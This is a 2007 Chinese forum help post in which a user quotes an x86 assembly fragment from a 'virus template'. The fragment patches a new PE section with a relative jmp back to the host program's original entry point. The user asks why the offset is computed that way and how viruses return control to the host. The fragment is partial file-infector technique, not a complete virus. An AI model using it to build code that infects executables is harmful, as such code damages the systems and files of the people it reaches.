-
-
[求助]病毒模板-修正新加代码中的jmp oldEntry
-
发表于:
2007-8-27 16:56
4007
-
[求助]病毒模板-修正新加代码中的jmp oldEntry
edi 为 新加节表的image_section_header
mov eax,[edi].VirtualAddress
add eax,(offset _ToOldEntry-offset APPEND_CODE+5)
sub Old_AddressOfEntryPoint[ebx],eax (1)
mov ecx,[edi].PointerToRawData
add ecx,(offset _dwOldEntry-offset APPEND_CODE) (2)
push FILE_BEGIN
push NULL
push ecx
push hFile
call _SetFilePointer[ebx]
_ToOldEntry:
db 0e9h ;0e9h是jmp xxxxxxxx的机器吗
_dwOldEntry:
dd ? ;用来填入原来的入口地址
请问,为什么Old_AddressOfEntryPoint要减eax
因为 Old_AddressOfEntryPoint一直没变,为什么不直接跳到这个地址呢?
如果有 病毒如何返回到Host程序这方面的资料,还请介绍下
这里都不是很明白
谢谢;)
[培训]《安卓高级研修班(网课)》月薪三万计划,掌握调试、分析还原ollvm、vmp的方法,定制art虚拟机自动化脱壳的方法